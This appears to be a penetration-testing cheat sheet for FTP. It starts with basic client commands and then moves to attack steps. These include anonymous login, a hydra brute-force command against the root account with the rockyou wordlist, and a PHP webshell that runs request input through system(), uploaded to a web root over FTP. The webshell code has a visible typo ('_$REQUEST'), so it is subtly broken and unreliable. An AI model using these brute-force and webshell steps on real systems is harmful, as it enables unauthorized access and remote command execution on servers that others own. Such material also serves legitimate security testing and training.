Login
Login to FTP using the following command. You will be prompted to enter a username and password.
ftp {IP}
Download
Download a file from FTP using the following command.
get creds.txt
There is also the option to download multiple files.
mget *
Upload
Upload a file from FTP using the following command.
put hello.txt
There is also the option to upload multiple files.
put *
List
To list files in FTP, use the following command.
dir
You can list hidden files with the following command.
dir -a
Anonymous Login
Sometimes FTP servers may be misconfigured to allow for anonymous login.
ftp {IP}
>anonymous
>anonymous
Bruteforce
Bruteforce FTP using the following command.
hydra -l root -P /usr/share/wordlists/rockyou.txt {IP} ftp
Webshell Upload
If you have proper permissions, you may be able to upload a webshell via FTP and execute it on the website. This can be done by either having a disclosure of the website's path or by guessing.
Step 1 - Create a Webshell
<?php
echo "Shelled";
system(_$REQUEST['cmd']);
?>
Step 2 - Upload Webshell to Webroot via FTP
ftp> put shell.php C:\\xampp\\htdocs\\shell.php